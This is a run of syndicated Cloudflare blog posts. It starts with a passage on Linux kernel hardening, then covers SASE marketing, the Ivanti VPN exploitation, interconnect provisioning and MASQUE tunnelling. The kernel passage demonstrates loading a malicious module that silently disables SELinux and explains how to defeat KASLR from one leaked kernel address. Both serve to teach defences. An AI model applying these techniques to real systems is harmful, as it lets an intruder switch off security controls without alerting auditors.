ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
ignat@dev:~/mymod$ sudo getenforce
Permissive

Not only did we disable the SELinux protection via a malicious kernel module, we did it quietly. Normal sudo setenforce 0, even if allowed, would go through the official selinuxfs interface and would emit an audit message. Our code manipulated the kernel memory directly, so no one was alerted. This illustrates why uncontrolled kernel module loading is very dangerous and that is why most security standards and commercial security monitoring products advocate for close monitoring of kernel module loading.

But we don’t need to monitor kernel modules at Cloudflare. Let’s repeat the exercise on a Cloudflare production kernel (module recompilation skipped for brevity):

ignat@dev:~/mymod$ uname -a
Linux dev 6.6.17-cloudflare-2024.2.9 #1 SMP PREEMPT_DYNAMIC Mon Sep 27 00:00:00 UTC 2010 x86_64 GNU/Linux
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
insmod: ERROR: could not insert module /lib/modules/6.6.17-cloudflare-2024.2.9/kernel/crypto/mymod.ko: Key was rejected by service

We get a Key was rejected by service error when trying to load a module, and the kernel log will have the following message:

ignat@dev:~/mymod$ sudo dmesg | tail -n 1
[41515.037031] Loading of unsigned module is rejected

This is because the Cloudflare kernel requires all the kernel modules to have a valid signature, so we don’t even have to worry about a malicious module being loaded at some point:

ignat@dev:~$ grep MODULE_SIG_FORCE /boot/config-`uname -r`
CONFIG_MODULE_SIG_FORCE=y

For completeness it is worth noting that the Debian stock kernel also supports module signatures, but does not enforce it:

ignat@dev:~$ grep MODULE_SIG /boot/config-6.1.0-18-cloud-amd64
CONFIG_MODULE_SIG_FORMAT=y
CONFIG_MODULE_SIG=y
# CONFIG_MODULE_SIG_FORCE is not set
…

The above configuration means that the kernel will validate a module signature, if available. But if not – the module will be loaded anyway with a warning message emitted and the kernel will be tainted.

Key management for kernel module signing

Signed kernel modules are great, but it creates a key management problem: to sign a module we need a signing keypair that is trusted by the kernel. The public key of the keypair is usually directly embedded into the kernel binary, so the kernel can easily use it to verify module signatures. The private key of the pair needs to be protected and secure, because if it is leaked, anyone could compile and sign a potentially malicious kernel module which would be accepted by our kernel.

But what is the best way to eliminate the risk of losing something? Not to have it in the first place! Luckily the kernel build system will generate a random keypair for module signing, if none is provided. At Cloudflare, we use that feature to sign all the kernel modules during the kernel compilation stage. When the compilation and signing is done though, instead of storing the key in a secure place, we just destroy the private key:

So with the above process:

  1. The kernel build system generated a random keypair, compiles the kernel and modules
  2. The public key is embedded into the kernel image, the private key is used to sign all the modules
  3. The private key is destroyed

With this scheme not only do we not have to worry about module signing key management, we also use a different key for each kernel we release to production. So even if a particular build process is hijacked and the signing key is not destroyed and potentially leaked, the key will no longer be valid when a kernel update is released.

There are some flexibility downsides though, as we can’t “retrofit” a new kernel module for an already released kernel (for example, for a new piece of hardware we are adopting). However, it is not a practical limitation for us as we release kernels often (roughly every week) to keep up with a steady stream of bug fixes and vulnerability patches in the Linux Kernel.

KEXEC

KEXEC (or kexec_load()) is an interesting system call in Linux, which allows for one kernel to directly execute (or jump to) another kernel. The idea behind this is to switch/update/downgrade kernels faster without going through a full reboot cycle to minimize the potential system downtime. However, it was developed quite a while ago, when secure boot and system integrity was not quite a concern. Therefore its original design has security flaws and is known to be able to bypass secure boot and potentially compromise system integrity.

We can see the problems just based on the definition of the system call itself:

struct kexec_segment {
	const void *buf;
	size_t bufsz;
	const void *mem;
	size_t memsz;
};
...
long kexec_load(unsigned long entry, unsigned long nr_segments, struct kexec_segment *segments, unsigned long flags);

So the kernel expects just a collection of buffers with code to execute. Back in those days there was not much desire to do a lot of data parsing inside the kernel, so the idea was to parse the to-be-executed kernel image in user space and provide the kernel with only the data it needs. Also, to switch kernels live, we need an intermediate program which would take over while the old kernel is shutting down and the new kernel has not yet been executed. In the kexec world this program is called purgatory. Thus the problem is evident: we give the kernel a bunch of code and it will happily execute it at the highest privilege level. But instead of the original kernel or purgatory code, we can easily provide code similar to the one demonstrated earlier in this post, which disables SELinux (or does something else to the kernel).

At Cloudflare we have had kexec_load() disabled for some time now just because of this. The advantage of faster reboots with kexec comes with a (small) risk of improperly initialized hardware, so it was not worth using it even without the security concerns. However, kexec does provide one useful feature — it is the foundation of the Linux kernel crashdumping solution. In a nutshell, if a kernel crashes in production (due to a bug or some other error), a backup kernel (previously loaded with kexec) can take over, collect and save the memory dump for further investigation. This allows to more effectively investigate kernel and other issues in production, so it is a powerful tool to have.

Luckily, since the original problems with kexec were outlined, Linux developed an alternative secure interface for kexec: instead of buffers with code it expects file descriptors with the to-be-executed kernel image and initrd and does parsing inside the kernel. Thus, only a valid kernel image can be supplied. On top of this, we can configure and require kexec to ensure the provided images are properly signed, so only authorized code can be executed in the kexec scenario. A secure configuration for kexec looks something like this:

ignat@dev:~$ grep KEXEC /boot/config-`uname -r`
CONFIG_KEXEC_CORE=y
CONFIG_HAVE_IMA_KEXEC=y
# CONFIG_KEXEC is not set
CONFIG_KEXEC_FILE=y
CONFIG_KEXEC_SIG=y
CONFIG_KEXEC_SIG_FORCE=y
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…

Above we ensure that the legacy kexec_load() system call is disabled by disabling CONFIG_KEXEC, but still can configure Linux Kernel crashdumping via the new kexec_file_load() system call via CONFIG_KEXEC_FILE=y with enforced signature checks (CONFIG_KEXEC_SIG=y and CONFIG_KEXEC_SIG_FORCE=y).

Note that stock Debian kernel has the legacy kexec_load() system call enabled and does not enforce signature checks for kexec_file_load() (similar to module signature checks):

ignat@dev:~$ grep KEXEC /boot/config-6.1.0-18-cloud-amd64
CONFIG_KEXEC=y
CONFIG_KEXEC_FILE=y
CONFIG_ARCH_HAS_KEXEC_PURGATORY=y
CONFIG_KEXEC_SIG=y
# CONFIG_KEXEC_SIG_FORCE is not set
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…

Kernel Address Space Layout Randomization (KASLR)

Even on the stock Debian kernel if you try to repeat the exercise we described in the “Secure boot” section of this post after a system reboot, you will likely see it would fail to disable SELinux now. This is because we hardcoded the kernel address of the selinux_state structure in our malicious kernel module, but the address changed now:

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state

Kernel Address Space Layout Randomization (or KASLR) is a simple concept: it slightly and randomly shifts the kernel code and data on each boot:

This is to combat targeted exploitation (like the malicious module in this post) based on the knowledge of the location of internal kernel structures and code. It is especially useful for popular Linux distribution kernels, like the Debian one, because most users use the same binary and anyone can download the debug symbols and the System.map file with all the addresses of the kernel internals. Just to note: it will not prevent the module loading and doing harm, but it will likely not achieve the targeted effect of disabling SELinux. Instead, it will modify a random piece of kernel memory potentially causing the kernel to crash.

Both the Cloudflare kernel and the Debian one have this feature enabled:

ignat@dev:~$ grep RANDOMIZE_BASE /boot/config-`uname -r`
CONFIG_RANDOMIZE_BASE=y

Restricted kernel pointers

While KASLR helps with targeted exploits, it is quite easy to bypass since everything is shifted by a single random offset as shown on the diagram above. Thus if the attacker knows at least one runtime kernel address, they can recover this offset by subtracting the runtime address from the compile time address of the same symbol (function or data structure) from the kernel’s System.map file. Once they know the offset, they can recover the addresses of all other symbols by adjusting them by this offset.

Therefore, modern kernels take precautions not to leak kernel addresses at least to unprivileged users. One of the main tunables for this is the kptr_restrict sysctl. It is a good idea to set it at least to 1 to not allow regular users to see kernel pointers:
(shell/bash)

ignat@dev:~$ sudo sysctl -w kernel.kptr_restrict=1
kernel.kptr_restrict = 1
ignat@dev:~$ grep selinux_state /proc/kallsyms
0000000000000000 B selinux_state

Privileged users can still see the pointers:

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state

Similar to kptr_restrict sysctl there is also dmesg_restrict, which if set, would prevent regular users from reading the kernel log (which may also leak kernel pointers via its messages). While you need to explicitly set kptr_restrict sysctl to a non-zero value on each boot (or use some system sysctl configuration utility, like this one), you can configure dmesg_restrict initial value via the CONFIG_SECURITY_DMESG_RESTRICT kernel configuration option. Both the Cloudflare kernel and the Debian one enforce dmesg_restrict this way:

ignat@dev:~$ grep CONFIG_SECURITY_DMESG_RESTRICT /boot/config-`uname -r`
CONFIG_SECURITY_DMESG_RESTRICT=y

Worth noting that /proc/kallsyms and the kernel log are not the only sources of potential kernel pointer leaks. There is a lot of legacy in the Linux kernel and [new sources are continuously being found and patched]. That’s why it is very important to stay up to date with the latest kernel bugfix releases.

Lockdown LSM

Linux Security Modules (LSM) is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux Kernel. We have [covered our usage of another LSM module, BPF-LSM, previously].

BPF-LSM is a useful foundational piece for our kernel security, but in this post we want to mention another useful LSM module we use — the Lockdown LSM. Lockdown can be in three states (controlled by the /sys/kernel/security/lockdown special file):

ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality

none is the state where nothing is enforced and the module is effectively disabled. When Lockdown is in the integrity state, the kernel tries to prevent any operation, which may compromise its integrity. We already covered some examples of these in this post: loading unsigned modules and executing unsigned code via KEXEC. But there are other potential ways (which are mentioned in the LSM’s man page), all of which this LSM tries to block. confidentiality is the most restrictive mode, where Lockdown will also try to prevent any information leakage from the kernel. In practice this may be too restrictive for server workloads as it blocks all runtime debugging capabilities, like perf or eBPF.

Let’s see the Lockdown LSM in action. On a barebones Debian system the initial state is none meaning nothing is locked down:

ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality

We can switch the system into the integrity mode:

ignat@dev:~$ echo integrity | sudo tee /sys/kernel/security/lockdown
integrity
ignat@dev:~$ cat /sys/kernel/security/lockdown
none [integrity] confidentiality

It is worth noting that we can only put the system into a more restrictive state, but not back. That is, once in integrity mode we can only switch to confidentiality mode, but not back to none:

ignat@dev:~$ echo none | sudo tee /sys/kernel/security/lockdown
none
tee: /sys/kernel/security/lockdown: Operation not permitted

Now we can see that even on a stock Debian kernel, which as we discovered above, does not enforce module signatures by default, we cannot load a potentially malicious unsigned kernel module anymore:

ignat@dev:~$ sudo insmod mymod/mymod.ko
insmod: ERROR: could not insert module mymod/mymod.ko: Operation not permitted

And the kernel log will helpfully point out that this is due to Lockdown LSM:

ignat@dev:~$ sudo dmesg | tail -n 1
[21728.820129] Lockdown: insmod: unsigned module loading is restricted; see man kernel_lockdown.7

As we can see, Lockdown LSM helps to tighten the security of a kernel, which otherwise may not have other enforcing bits enabled, like the stock Debian one.

If you compile your own kernel, you can go one step further and set the initial state of the Lockdown LSM to be more restrictive than none from the start. This is exactly what we did for the Cloudflare production kernel:

ignat@dev:~$ grep LOCK_DOWN /boot/config-6.6.17-cloudflare-2024.2.9
# CONFIG_LOCK_DOWN_KERNEL_FORCE_NONE is not set
CONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y
# CONFIG_LOCK_DOWN_KERNEL_FORCE_CONFIDENTIALITY is not set

Conclusion

In this post we reviewed some useful Linux kernel security configuration options we use at Cloudflare. This is only a small subset, and there are many more available and even more are being constantly developed, reviewed, and improved by the Linux kernel community. We hope that this post will shed some light on these security features and that, if you haven’t already, you may consider enabling them in your Linux systems.

Watch on Cloudflare TV

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Cloudflare treats SASE anxiety for VeloCloud customers

Post Syndicated from Brian Tokuyoshi original https://blog.cloudflare.com/treating-sase-anxiety


We understand that your VeloCloud deployment may be partially or even fully deployed. You may be experiencing discomfort from SASE anxiety. Symptoms include:

If you’re a VeloCloud customer, we are here to help you with your transition to Magic WAN, with planning, products and services. You’ve experienced the turbulence, and that’s why we are taking steps to help. First, it’s necessary to illustrate what’s fundamentally wrong with the architecture by acquisition model in order to define the right path forward. Second, we document the steps involved for making a transition from VeloCloud to Cloudflare. Third, we are offering a helping hand to help VeloCloud customers to get their SASE strategies back on track.

Architecture is the key to SASE

Your IT organization must deliver stability across your information systems, because the future of your business depends on the decisions that you make today. You need to make sure that your SASE journey is backed by vendors that you can depend on. Indecisive vendors and unclear strategies rarely inspire confidence, and it’s driving organizations to reconsider their relationship.

It’s not just VeloCloud that’s pivoting. Many vendors are chasing the brass ring to meet the requirement for Single Vendor SASE, and they’re trying to reduce their time to market by acquiring features on their checklist, rather than taking the time to build the right architecture for consistent management and user experience. It’s led to rapid consolidation of both startups and larger product stacks, but now we’re seeing many many instances of vendors having to rationalize their overlapping product lines. Strange days indeed.

But the thing is, Single Vendor SASE is not a feature checklist game. It’s not like shopping for PC antivirus software where the most attractive option was the one with the most checkboxes. It doesn’t matter if you acquire a large stack of product acronyms (ZTNA, SD-WAN, SWG, CASB, DLP,  FWaaS, SD-WAN to name but a few) if the results are just as convoluted as the technology it aims to replace.

If organizations are new to SASE, then it can be difficult to know what to look for. However, one clear sign of trouble is taking an SSE designed by one vendor and combining it with SD-WAN from another. Because you can’t get a converged platform out of two fundamentally incongruent technologies.

Why SASE Math Doesn’t Work

The conceptual model for SASE typically illustrates two half circles, with one consisting of cloud-delivered networking and the other being cloud-delivered security. With this picture in mind, it’s easy to see how one might think that combining an implementation of cloud-delivered networking (VeloCloud SD-WAN) and an implementation of cloud-delivered security (Symantec Network Protection – SSE) might satisfy the requirements. Does Single Vendor SASE = SD-WAN + SSE?

In practice, networking and network security do not exist in separate universes, but SD-WAN and SSE implementations do, especially when they were designed by different vendors. That’s why the math doesn’t work, because even with the requisite SASE functionality, the implementation of the functionality doesn’t fit. SD-WAN is designed for network connectivity between sites over the SD-WAN fabric, whereas SSE largely focuses on the enforcement of security policy for user->application traffic from remote users or traffic leaving (rather than traversing) the SD-WAN fabric. Therefore, to bring these two worlds together, you end up with security inconsistency, proxy chains which create a burden on latency, or implementing security at the edge rather than in the cloud.

Why Cloudflare is different

At Cloudflare, the basis for our approach to single vendor SASE starts from building a global network designed with private data centers, overprovisioned network and compute capacity, and a private backbone designed to deliver our customer’s traffic to any destination. It’s what we call any-to-any connectivity. It’s not using the public cloud for SASE services, because the public cloud was designed as a destination for traffic rather than being optimized for transit. We are in full control of the design of our data centers and network and we’re obsessed with making it even better every day.

It’s from this network that we deliver networking and security services. Conceptually, we implement a philosophy of composability, where the fundamental network connection between the customer’s site and the Cloudflare data center remains the same across different use cases. In practice, and unlike traditional approaches, it means no downtime for service insertion when you need more functionality — the connection to Cloudflare remains the same. It’s the services and the onboarding of additional destinations that changes as organizations expand their use of Cloudflare.

From the perspective of branch connectivity, use Magic WAN for the connectivity that ties your business together, no matter which way traffic passes. That’s because we don’t treat the directions of your network traffic as independent problems. We solve for consistency by on-ramping all traffic through one of Cloudflare’s 310+ anycasted data centers (whether inbound, outbound, or east-west) for enforcement of security policy. We solve for latency by eliminating the need to forward traffic to a compute location by providing full compute services in every data center. We implement SASE using a light edge / heavy cloud model, with services delivered within the Cloudflare connectivity cloud rather than on-prem.

How to transition from VeloCloud to Cloudflare

Start by contacting us to get a consultation session with our solutions architecture team. Our architects specialize in network modernization and can map your SASE goals across a series of smaller projects. We’ve worked with hundreds of organizations to achieve their SASE goals with the Cloudflare connectivity cloud and can build a plan that your team can execute on.

For product education, join one of our product workshops on Magic WAN to get a deep dive into how it’s built and how it can be rolled out to your locations. Magic WAN uses a light edge, heavy cloud model that has multiple network insertion models (whether a tunnel from an existing device, using our turnkey Magic WAN Connector, or deploying a virtual appliance) which can work in parallel or as a replacement for your branch connectivity needs, thus allowing you to migrate at your pace. Our specialist teams can help you mitigate transitionary hardware and license costs as you phase out VeloCloud and accelerate your rollout of Magic WAN.

The Magic WAN technical engineers have a number of resources to help you build product knowledge as well. This includes reference architectures and quick start guides that address your organization’s connectivity goals, whether sizing down your on-prem network in favor of the emerging “coffee shop networking” philosophy, retiring legacy SD-WAN, and full replacement of conventional MPLS.

For services, our customer success teams are ready to support your transition, with services that are tailored specifically for Magic WAN migrations both large and small.

Your next move

Interested in learning more? Contact us to get started, and we’ll help you with your SASE journey. Contact us to learn how to replace VeloCloud with Cloudflare Magic WAN and use our network as an extension of yours.

Eliminate VPN vulnerabilities with Cloudflare One

Post Syndicated from Dan Hall original https://blog.cloudflare.com/eliminate-vpn-vulnerabilities-with-cloudflare-one


On January 19, 2024, the Cybersecurity & Infrastructure Security Agency (CISA) issued Emergency Directive 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities. CISA has the authority to issue emergency directives in response to a known or reasonably suspected information security threat, vulnerability, or incident. U.S. Federal agencies are required to comply with these directives.

Federal agencies were directed to apply a mitigation against two recently discovered vulnerabilities; the mitigation was to be applied within three days. Further monitoring by CISA revealed that threat actors were continuing to exploit the vulnerabilities and had developed some workarounds to earlier mitigations and detection methods. On January 31, CISA issued Supplemental Direction V1 to the Emergency Directive instructing agencies to immediately disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure products from agency networks and perform several actions before bringing the products back into service.

This blog post will explore the threat actor’s tactics, discuss the high-value nature of the targeted products, and show how Cloudflare’s Secure Access Service Edge (SASE) platform protects against such threats.

As a side note and showing the value of layered protections, Cloudflare’s WAF had proactively detected the Ivanti zero-day vulnerabilities and deployed emergency rules to protect Cloudflare customers.

Threat Actor Tactics

Forensic investigations (see the Volexity blog for an excellent write-up) indicate that the attacks began as early as December 2023. Piecing together the evidence shows that the threat actors chained two previously unknown vulnerabilities together to gain access to the Connect Secure and Policy Secure appliances and achieve unauthenticated remote code execution (RCE).

CVE-2023-46805 is an authentication bypass vulnerability in the products’ web components that allows a remote attacker to bypass control checks and gain access to restricted resources. CVE-2024-21887 is a command injection vulnerability in the products’ web components that allows an authenticated administrator to execute arbitrary commands on the appliance and send specially crafted requests. The remote attacker was able to bypass authentication and be seen as an “authenticated” administrator, and then take advantage of the ability to execute arbitrary commands on the appliance.

By exploiting these vulnerabilities, the threat actor had near total control of the appliance. Among other things, the attacker was able to:

  • Harvest credentials from users logging into the VPN service
  • Use these credentials to log into protected systems in search of even more credentials
  • Modify files to enable remote code execution
  • Deploy web shells to a number of web servers
  • Reverse tunnel from the appliance back to their command-and-control server (C2)
  • Avoid detection by disabling logging and clearing existing logs

Little Appliance, Big Risk

This is a serious incident that is exposing customers to significant risk. CISA is justified in issuing their directive, and Ivanti is working hard to mitigate the threat and develop patches for the software on their appliances. But it also serves as another indictment of the legacy “castle-and-moat” security paradigm. In that paradigm, remote users were outside the castle while protected applications and resources remained inside. The moat, consisting of a layer of security appliances, separated the two. The moat, in this case the Ivanti appliance, was responsible for authenticating and authorizing users, and then connecting them to protected applications and resources. Attackers and other bad actors were blocked at the moat.

This incident shows us what happens when a bad actor is able to take control of the moat itself, and the challenges customers face to recover control. Two typical characteristics of vendor-supplied appliances and the legacy security strategy highlight the risks:

  • Administrators have access to the internals of the appliance
  • Authenticated users indiscriminately have access to a wide range of applications and resources on the corporate network, increasing the risk of bad actor lateral movement

A better way: Cloudflare’s SASE platform

Cloudflare One is Cloudflare’s SSE and single-vendor SASE platform. While Cloudflare One spans broadly across security and networking services (and you can read about the latest additions here), I want to focus on the two points noted above.

First, Cloudflare One employs the principles of Zero Trust, including the principle of least privilege. As such, users that authenticate successfully only have access to the resources and applications necessary for their role. This principle also helps in the event of a compromised user account as the bad actor does not have indiscriminate network-level access. Rather, least privilege limits the range of lateral movement that a bad actor has, effectively reducing the blast radius.

Second, while customer administrators need to have access to configure their services and policies, Cloudflare One does not provide any external access to the system internals of Cloudflare’s platform. Without that access, a bad actor would not be able to launch the types of attacks executed when they had access to the internals of the Ivanti appliance.  

It’s time to eliminate the legacy VPN

If your organization is impacted by the CISA directive, or you are just ready to modernize and want to augment or replace your current VPN solution, Cloudflare is here to help. Cloudflare’s Zero Trust Network Access (ZTNA) service, part of the Cloudflare One platform, is the fastest and safest way to connect any user to any application.

Contact us to get immediate onboarding help or to schedule an architecture workshop to help you augment or replace your Ivanti (or any) VPN solution.
Not quite ready for a live conversation? Read our learning path article on how to replace your VPN with Cloudflare or our SASE reference architecture for a view of how all of our SASE services and on-ramps work together.

Simplifying how enterprises connect to Cloudflare with Express Cloudflare Network Interconnect

Post Syndicated from Ben Ritter original https://blog.cloudflare.com/announcing-express-cni


We’re excited to announce the largest update to Cloudflare Network Interconnect (CNI) since its launch, and because we’re making CNIs faster and easier to deploy, we’re calling this Express CNI. At the most basic level, CNI is a cable between a customer’s network router and Cloudflare, which facilitates the direct exchange of information between networks instead of via the Internet. CNIs are fast, secure, and reliable, and have connected customer networks directly to Cloudflare for years. We’ve been listening to how we can improve the CNI experience, and today we are sharing more information about how we’re making it faster and easier to order CNIs, and connect them to Magic Transit and Magic WAN.

Interconnection services and what to consider

Interconnection services provide a private connection that allows you to connect your networks to other networks like the Internet, cloud service providers, and other businesses directly. This private connection benefits from improved connectivity versus going over the Internet and reduced exposure to common threats like Distributed Denial of Service (DDoS) attacks.

Cost is an important consideration when evaluating any vendor for interconnection services. The cost of an interconnection is typically comprised of a fixed port fee, based on the capacity (speed) of the port, and the variable amount of data transferred. Some cloud providers also add complex inter-region bandwidth charges.

Other important considerations include the following:

  • How much capacity is needed?
  • Are there variable or fixed costs associated with the port?
  • Is the provider located in the same colocation facility as my business?
  • Are they able to scale with my network infrastructure?
  • Are you able to predict your costs without any unwanted surprises?
  • What additional products and services does the vendor offer?

Cloudflare does not charge a port fee for Cloudflare Network Interconnect, nor do we charge for inter-region bandwidth. Using CNI with products like Magic Transit and Magic WAN may even reduce bandwidth spending with Internet service providers. For example, you can deliver Magic Transit-cleaned traffic to your data center with a CNI instead of via your Internet connection, reducing the amount of bandwidth that you would pay an Internet service provider for.

To underscore the value of CNI, one vendor charges nearly \$20,000 a year for a 10 Gigabit per second (Gbps) direct connect port. The same 10 Gbps CNI on Cloudflare for one year is $0. Their cost also does not include any costs related to the amount of data transferred between different regions or geographies, or outside of their cloud. We have never charged for CNIs, and are committed to making it even easier for customers to connect to Cloudflare, and destinations beyond on the open Internet.

3 Minute Provisioning

Our first big announcement is a new, faster approach to CNI provisioning and deployment. Starting today, all Magic Transit and Magic WAN customers can order CNIs directly from their Cloudflare account. The entire process is about 3 clicks and takes less than 3 minutes (roughly the time to make coffee). We’re going to show you how simple it is to order a CNI.

The first step is to find out whether Cloudflare is in the same data center or colocation facility as your routers, servers, and network hardware. Let’s navigate to the new “Interconnects” section of the Cloudflare dashboard, and order a new Direct CNI.

Search for the city of your data center, and quickly find out if Cloudflare is in the same facility. I’m going to stand up a CNI to connect my example network located in Ashburn, VA.

It looks like Cloudflare is in the same facility as my network, so I’m going to select the location where I’d like to connect.

As of right now, my data center is only exchanging a few hundred Megabits per second of traffic on Magic Transit, so I’m going to select a 1 Gigabit per second interface, which is the smallest port speed available. I can also order a 10 Gbps link if I have more than 1 Gbps of traffic in a single location. Cloudflare also supports 100 Gbps CNIs, but if you have this much traffic to exchange with us, we recommend that you coordinate with your account team.

After selecting your preferred port speed, you can name your CNI, which will be referenceable later when you direct your Magic Transit or Magic WAN traffic to the interconnect. We are given the opportunity to verify that everything looks correct before confirming our CNI order.

Once we click the “Confirm Order” button, Cloudflare will provision an interface on our router for your CNI, and also assign IP addresses for you to configure on your router interface. Cloudflare will also issue you a Letter of Authorization (LOA) for you to order a cross connect with the local facility. Cloudflare will provision a port on our router for your CNI within 3 minutes of your order, and you will be able to ping across the CNI as soon as the interface line status comes up.

After downloading the Letter of Authorization (LOA) to order a cross connect, we’ll navigate back to our Interconnects area. Here we can see the point to point IP addressing, and the CNI name that is used in our Magic Transit or Magic WAN configuration. We can also redownload the LOA if needed.

Simplified Magic Transit and Magic WAN onboarding

Our second major announcement is that Express CNI dramatically simplifies how Magic Transit and Magic WAN customers connect to Cloudflare. Getting packets into Magic Transit or Magic WAN in the past with a CNI required customers to configure a GRE (Generic Routing Encapsulation) tunnel on their router. These configurations are complex, and not all routers and switches support these changes. Since both Magic Transit and Magic WAN protect networks, and operate at the network layer on packets, customers rightly asked us, “If I connect directly to Cloudflare with CNI, why do I also need a GRE tunnel for Magic Transit and Magic WAN?”

Starting today, GRE tunnels are no longer required with Express CNI. This means that Cloudflare supports standard 1500-byte packets on the CNI, and there’s no need for complex GRE or MSS adjustment configurations to get traffic into Magic Transit or Magic WAN. This significantly reduces the amount of configuration required on a router for Magic Transit and Magic WAN customers who can connect over Express CNI. If you’re not familiar with Magic Transit, the key takeaway is that we’ve reduced the complexity of changes you must make on your router to protect your network with Cloudflare.

What’s next for CNI?

We’re excited about how Express CNI simplifies connecting to Cloudflare’s network. Some customers connect to Cloudflare through our Interconnection Platform Partners, like Equinix and Megaport, and we plan to bring the Express CNI features to our partners too.

We have upgraded a number of our data centers to support Express CNI, and plan to upgrade many more over the next few months. We are rapidly expanding the number of global locations that support Express CNI as we install new network hardware. If you’re interested in connecting to Cloudflare with Express CNI, but are unable to find your data center, please let your account team know.

If you’re on an existing classic CNI today, and you don’t need Express CNI features, there is no obligation to migrate to Express CNI. Magic Transit and Magic WAN customers have been asking for BGP support to control how Cloudflare routes traffic back to their networks, and we expect to extend BGP support to Express CNI first, so keep an eye out for more Express CNI announcements later this year.

Get started with Express CNI today

As we’ve demonstrated above, Express CNI makes it fast and easy to connect your network to Cloudflare. If you’re a Magic Transit or Magic WAN customer, the new “Interconnects” area is now available on your Cloudflare dashboard. To deploy your first CNI, you can follow along with the screenshots above, or refer to our updated interconnects documentation.

Zero Trust WARP: tunneling with a MASQUE

Post Syndicated from Dan Hall original https://blog.cloudflare.com/zero-trust-warp-with-a-masque


Slipping on the MASQUE

In June 2023, we told you that we were building a new protocol, MASQUE, into WARP. MASQUE is a fascinating protocol that extends the capabilities of HTTP/3 and leverages the unique properties of the QUIC transport protocol to efficiently proxy IP and UDP traffic without sacrificing performance or privacy

At the same time, we’ve seen a rising demand from Zero Trust customers for features and solutions that only MASQUE can deliver. All customers want WARP traffic to look like HTTPS to avoid detection and blocking by firewalls, while a significant number of customers also require FIPS-compliant encryption. We have something good here, and it’s been proven elsewhere (more on that below), so we are building MASQUE into Zero Trust WARP and will be making it available to all of our Zero Trust customers — at WARP speed!

This blog post highlights some of the key benefits our Cloudflare One customers will realize with MASQUE.

Before the MASQUE

Cloudflare is on a mission to help build a better Internet. And it is a journey we’ve been on with our device client and WARP for almost five years. The precursor to WARP was the 2018 launch of 1.1.1.1, the Internet’s fastest, privacy-first consumer DNS service. WARP was introduced in 2019 with the announcement of the 1.1.1.1 service with WARP, a high performance and secure consumer DNS and VPN solution. Then in 2020, we introduced Cloudflare’s Zero Trust platform and the Zero Trust version of WARP to help any IT organization secure their environment, featuring a suite of tools we first built to protect our own IT systems. Zero Trust WARP with MASQUE is the next step in our journey.

The current state of WireGuard

WireGuard was the perfect choice for the 1.1.1.1 with WARP service in 2019. WireGuard is fast, simple, and secure. It was exactly what we needed at the time to guarantee our users’ privacy, and it has met all of our expectations. If we went back in time to do it all over again, we would make the same choice.

But the other side of the simplicity coin is a certain rigidity. We find ourselves wanting to extend WireGuard to deliver more capabilities to our Zero Trust customers, but WireGuard is not easily extended. Capabilities such as better session management, advanced congestion control, or simply the ability to use FIPS-compliant cipher suites are not options within WireGuard; these capabilities would have to be added on as proprietary extensions, if it was even possible to do so.

Plus, while WireGuard is popular in VPN solutions, it is not standards-based, and therefore not treated like a first class citizen in the world of the Internet, where non-standard traffic can be blocked, sometimes intentionally, sometimes not. WireGuard uses a non-standard port, port 51820, by default. Zero Trust WARP changes this to use port 2408 for the WireGuard tunnel, but it’s still a non-standard port. For our customers who control their own firewalls, this is not an issue; they simply allow that traffic. But many of the large number of public Wi-Fi locations, or the approximately 7,000 ISPs in the world, don’t know anything about WireGuard and block these ports. We’ve also faced situations where the ISP does know what WireGuard is and blocks it intentionally.

This can play havoc for roaming Zero Trust WARP users at their local coffee shop, in hotels, on planes, or other places where there are captive portals or public Wi-Fi access, and even sometimes with their local ISP. The user is expecting reliable access with Zero Trust WARP, and is frustrated when their device is blocked from connecting to Cloudflare’s global network.

Now we have another proven technology — MASQUE — which uses and extends HTTP/3 and QUIC. Let’s do a quick review of these to better understand why Cloudflare believes MASQUE is the future.

Unpacking the acronyms

HTTP/3 and QUIC are among the most recent advancements in the evolution of the Internet, enabling faster, more reliable, and more secure connections to endpoints like websites and APIs. Cloudflare worked closely with industry peers through the Internet Engineering Task Force on the development of RFC 9000 for QUIC and RFC 9114 for HTTP/3. The technical background on the basic benefits of HTTP/3 and QUIC are reviewed in our 2019 blog post where we announced QUIC and HTTP/3 availability on Cloudflare’s global network.

Most relevant for Zero Trust WARP, QUIC delivers better performance on low-latency or high packet loss networks thanks to packet coalescing and multiplexing. QUIC packets in separate contexts during the handshake can be coalesced into the same UDP datagram, thus reducing the number of receive and system interrupts. With multiplexing, QUIC can carry multiple HTTP sessions within the same UDP connection. Zero Trust WARP also benefits from QUIC’s high level of privacy, with TLS 1.3 designed into the protocol.

MASQUE unlocks QUIC’s potential for proxying by providing the application layer building blocks to support efficient tunneling of TCP and UDP traffic. In Zero Trust WARP, MASQUE will be used to establish a tunnel over HTTP/3, delivering the same capability as WireGuard tunneling does today. In the future, we’ll be in position to add more value using MASQUE, leveraging Cloudflare’s ongoing participation in the MASQUE Working Group. This blog post is a good read for those interested in digging deeper into MASQUE.

OK, so Cloudflare is going to use MASQUE for WARP. What does that mean to you, the Zero Trust customer?

Proven reliability at scale

Cloudflare’s network today spans more than 310 cities in over 120 countries, and interconnects with over 13,000 networks globally. HTTP/3 and QUIC were introduced to the Cloudflare network in 2019, the HTTP/3 standard was finalized in 2022, and represented about 30% of all HTTP traffic on our network in 2023.

We are also using MASQUE for iCloud Private Relay and other Privacy Proxy partners. The services that power these partnerships, from our Rust-based proxy framework to our open source QUIC implementation, are already deployed globally in our network and have proven to be fast, resilient, and reliable.

